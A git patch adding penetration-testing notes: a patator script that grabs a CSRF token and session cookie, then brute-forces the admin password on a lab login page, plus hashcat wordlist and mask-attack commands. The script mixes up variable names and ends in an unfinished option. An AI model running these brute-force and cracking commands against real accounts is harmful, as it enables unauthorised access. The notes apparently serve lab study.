From e5bf02539675c9d2dd10017a986d759f36b6ad09 Mon Sep 17 00:00:00 2001
From: whx <stefan@stefan.works>
Date: Tue, 30 Aug 2022 22:15:41 +0200
Subject: [PATCH] added bruteforcing stuff

---
 hashes/bruteforce/patator.md | 23 +++++++++++++++++++++++
 hashes/hashcat_utils.md      | 13 +++++++++++++
 2 files changed, 36 insertions(+)
 create mode 100644 hashes/bruteforce/patator.md

diff --git a/hashes/bruteforce/patator.md b/hashes/bruteforce/patator.md
new file mode 100644
index 0000000..ad1a363
--- /dev/null
+++ b/hashes/bruteforce/patator.md
@@ -0,0 +1,23 @@
+# Patator Bruteforcing
+
+* [Lanjelot's Repo](https://github.com/lanjelot/patator/)
+
+## Modules
+
+* Available modules can be found under `patator --help`
+* Module specifics can be found via `patator <module> -h`
+
+## Using a Module
+
+* For example `http_fuzz` can be used via
+```sh
+TARGET_IP=10.0.47.11
+CSRF=$(curl -s -c stored.cookie "${IP}/login.php" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2)
+SESSION_ID=$(grep PHPSESSID stored.cookie | awk -F ' ' '{print $7}')
+
+echo "The CSRF is: $CSRF"
+echo "The PHPSESSID is: $SESSION_ID"
+
+patator.py http_fuzz method=POST --threads=64 timeout=10 url="http://${TARGET_IP}/login.php" 0=passwords.txt body="username=admin&password=FILE0&Login=Login&user_token=${CSRF}" header="Cookie: PHPSESSID=${SESSION_ID}; security=impossible" -x quit:fgrep!=login.php -x ignore:fgrep='Location: login.php' -x 
+```
+
diff --git a/hashes/hashcat_utils.md b/hashes/hashcat_utils.md
index 66becd2..948a63c 100644
--- a/hashes/hashcat_utils.md
+++ b/hashes/hashcat_utils.md
@@ -1,5 +1,9 @@
 # Hashcat Utilities
 
+* [Modes](https://hashcat.net/wiki/doku.php?id=example_hashes)
+
+## Wordlists
+
 * Combine wordlists
 ```sh
 combinator wordlist.txt otherwordlist.txt > newwordlist.txt
@@ -9,3 +13,12 @@ combinator wordlist.txt otherwordlist.txt > newwordlist.txt
 ```sh
 hashcat --force <input.txt> -r /opt/hashcat/rules/best64.rule --stdout > wordlist.txt
 ```
+
+## Using Masks
+
+* A mask can be set instead of a wordlist, this charset is then brute forced by iterating the charset
+* [Masks](https://hashcat.net/wiki/doku.php?id=mask_attack)
+* Bruteforcing seven lowerspace characters using `SHA2-384` as an example  
+```sh
+hashcat -m 10800 -a 3 hash.out ?l?l?l?l?l?l?l
+```